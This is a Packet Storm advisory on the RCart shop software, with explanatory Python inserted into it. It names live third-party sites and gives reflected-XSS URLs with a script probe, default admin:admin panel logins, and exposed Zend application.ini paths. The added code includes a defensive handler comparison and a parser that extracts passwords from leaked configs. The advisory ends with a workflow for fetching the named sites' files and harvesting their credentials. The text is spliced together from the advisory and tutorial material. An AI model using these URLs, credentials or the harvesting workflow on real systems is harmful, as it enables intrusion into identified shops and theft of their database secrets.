RCart Cross Site Scripting / Admin Panel

2012-09-01T00:00:00
ID PACKETSTORM:116158
Type packetstorm
Reporter ruben_linux
Modified 2012-09-01T00:00:00

Description

                                        
[ASCII banner: ruben_linux]
  
# Type: XSS & default admin panel
#
# Google Dork: "powered by rcart"
#
# Date: 1/9/12 (2012-09-01)
#
# Author: ruben_linux
#
# Site: http://arealinux(dot)blogspot(dot)com(dot)es
# http://www(dot)youtube(dot)com/user/rubenlinux
==================================  
  
[+] http://www.emallhub.com/  
[+] http://www.jaya4tech.com  
  
http://www.jaya4tech.com/ajax/ajaxseachauto?format=json&q=[HEREXSS]&limit=10&timestamp=1346508322457  
http://www.emallhub.com/ajax/ajaxseachauto?format=json&q=[HEREXSS]&limit=10&timestamp=1346508394788  
  
<<script>alert(132);  
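Why the reflection above is exploitable, and what a fixed handler looks like, as an added example that is not RCart code or part of the advisory: it models an /ajax/ajaxseachauto-style endpoint that copies the q parameter into its JSON response, once by string concatenation served as HTML and once JSON-encoded with the right headers, plus the triage check a tester would run over a captured response. The handler bodies, the product catalogue and the chosen header set are assumptions made for illustration.

```python
"""Reflected XSS through a JSON autocomplete endpoint: failure mode and fix.

Added example, not RCart code: it models an /ajax/ajaxseachauto-style
handler that copies the ``q`` parameter into its response. The handler
bodies, the catalogue and the header names used here are assumptions
made for illustration.
"""
import json

# Constructed catalogue standing in for the shop's product names.
_CATALOGUE = ["camera", "cable", "cart", "case"]

# The probe string from the advisory.
PAYLOAD = "<<script>alert(132);"


def _suggestions(q: str, limit: int) -> list[str]:
    return [p for p in _CATALOGUE if p.startswith(q.lower())][:limit]


def vulnerable_autocomplete(q: str, limit: int = 10) -> tuple[dict, str]:
    """Builds the JSON body by string formatting and labels it text/html.

    ``q`` lands in the body verbatim, so when a victim opens the URL the
    browser parses whatever markup the attacker put into ``q``.
    """
    items = ",".join('"%s"' % s for s in _suggestions(q, limit))
    body = '{"query":"%s","suggestions":[%s]}' % (q, items)
    headers = {"Content-Type": "text/html; charset=utf-8"}
    return headers, body


def hardened_autocomplete(q: str, limit: int = 10) -> tuple[dict, str]:
    """Serialises with json.dumps and declares the body as JSON.

    json.dumps escapes the quotes needed to break out of the string; the
    explicit replace turns < and > into \\u003c and \\u003e so the body
    contains no tag even if something does render it as HTML; the headers
    stop the browser from treating it as HTML in the first place.
    """
    body = json.dumps({"query": q, "suggestions": _suggestions(q, limit)})
    body = body.replace("<", "\\u003c").replace(">", "\\u003e")
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def decode_body(body: str) -> dict:
    """Parse a response body back to Python, to confirm the hardened
    encoding is still valid JSON that carries the original query."""
    return json.loads(body)


def reflects_unescaped(headers: dict, body: str, probe: str = PAYLOAD) -> bool:
    """Triage check for one captured response: the probe is echoed
    verbatim AND the response is served in a way a browser renders as
    HTML. Both conditions are needed for classic reflected XSS."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    rendered_as_html = ctype in ("", "text/html")
    return probe in body and rendered_as_html


if __name__ == "__main__":
    for handler in (vulnerable_autocomplete, hardened_autocomplete):
        h, b = handler(PAYLOAD)
        verdict = "VULNERABLE" if reflects_unescaped(h, b) else "ok"
        print(handler.__name__, "->", verdict)
        print("   ", b)
```

Against a live target the same check is: request the endpoint with the probe in q, then hand the response headers and body to reflects_unescaped. A body that echoes the probe but arrives as application/json with nosniff is still worth noting (the data is unescaped) but is not the direct script execution the advisory describes.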
  
Default admin panel credentials (admin:admin):
http://www.jaya4tech.com/admin
http://www.emallhub.com/admin
  
Also affected by the Zend Framework application.ini information disclosure described in:
http://packetstormsecurity.org/files/115906/Zend-Framework-Information-Disclosure.html  
  
[+] http://www.lumbiniimports.com/application/configs/application.ini  
[+] http://www.emallhub.com/application/configs/application.ini  
[+] http://www.jaya4tech.com/application/configs/application.ini  
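What an exposed application.ini gives an attacker, as an added example that is not part of the advisory or of RCart: a small parser for the Zend Framework 1 config layout (dotted resource keys and [child : parent] section inheritance) that reports every effective credential, including the ones a section inherits without stating them, plus a cheap fingerprint for telling a real config apart from a soft 404. The sample file, host names and passwords below are constructed for the example.

```python
"""Triage for an exposed Zend Framework 1 application.ini.

Added example, not part of the advisory or of RCart. SAMPLE_INI is
constructed to follow the ZF1 layout ([section : parent] inheritance,
dotted resource keys); its host names and credentials are invented.
"""
import re

SAMPLE_INI = """\
[production]
phpSettings.display_errors = 0
resources.db.adapter = "PDO_MYSQL"
resources.db.params.host = "db.internal.example"
resources.db.params.username = "shop"
resources.db.params.password = "Pr0d-S3cret"
resources.db.params.dbname = "shop"

[staging : production]
resources.db.params.host = "db-stage.internal.example"

[development : production]
phpSettings.display_errors = 1
resources.db.params.password = "devpass"
"""

# Key fragments that indicate a credential in a leaked config.
SECRET_KEY_RE = re.compile(r"(password|passwd|secret|api[_.]?key|token)", re.I)

_SECTION_RE = re.compile(r"^\[\s*([^\s:\]]+)\s*(?::\s*([^\s\]]+))?\s*\]$")


def parse_zend_ini(text: str) -> dict[str, dict[str, str]]:
    """Parse ZF1-style ini text into {section: {dotted.key: value}},
    resolving [child : parent] inheritance so each section holds its
    effective settings rather than only the lines written under it."""
    raw: dict[str, dict[str, str]] = {}
    parents: dict[str, str] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "#")):
            continue
        m = _SECTION_RE.match(line)
        if m:
            current, parent = m.group(1), m.group(2)
            raw[current] = {}
            if parent:
                parents[current] = parent
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        raw[current][key.strip()] = value.strip().strip("\"'")

    def resolve(name, seen=()):
        # Parent values first, then the child's own overrides on top.
        if name in seen:  # guard against a self-referencing chain
            return {}
        parent = parents.get(name)
        effective = dict(resolve(parent, seen + (name,))) if parent in raw else {}
        effective.update(raw.get(name, {}))
        return effective

    return {name: resolve(name) for name in raw}


def exposed_secrets(config: dict[str, dict[str, str]]) -> list[tuple[str, str, str]]:
    """List (section, key, value) for every effective setting whose key
    names a credential. Inherited values are reported too: ``staging``
    above never writes a password but still carries the production one."""
    found = []
    for section, settings in config.items():
        for key, value in settings.items():
            if SECRET_KEY_RE.search(key) and value:
                found.append((section, key, value))
    return found


def looks_like_zend_config(body: str) -> bool:
    """Fingerprint for a fetched /application/configs/application.ini:
    a [production] section plus a resources.* or phpSettings.* key, so a
    200 that is really an HTML error page is not counted as a leak."""
    return "[production]" in body and bool(
        re.search(r"^(resources|phpSettings)\.", body, re.M)
    )


if __name__ == "__main__":
    cfg = parse_zend_ini(SAMPLE_INI)
    for section, key, value in exposed_secrets(cfg):
        print(f"{section:12s} {key} = {value}")
```

For the three paths listed above the workflow is: fetch the file, confirm looks_like_zend_config on the body rather than trusting the status code, then run exposed_secrets over the parsed result so that nothing hidden behind section inheritance is missed.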